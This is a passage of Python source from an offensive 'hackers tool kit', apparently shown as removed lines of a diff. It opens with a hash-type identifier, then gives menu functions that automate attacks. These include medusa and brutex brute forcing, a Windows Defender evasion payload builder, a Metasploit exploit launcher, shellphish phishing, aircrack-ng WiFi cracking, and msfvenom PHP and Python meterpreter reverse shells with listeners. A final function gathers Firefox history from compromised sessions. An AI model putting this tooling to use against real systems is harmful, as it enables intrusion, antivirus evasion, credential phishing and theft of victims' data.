hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr 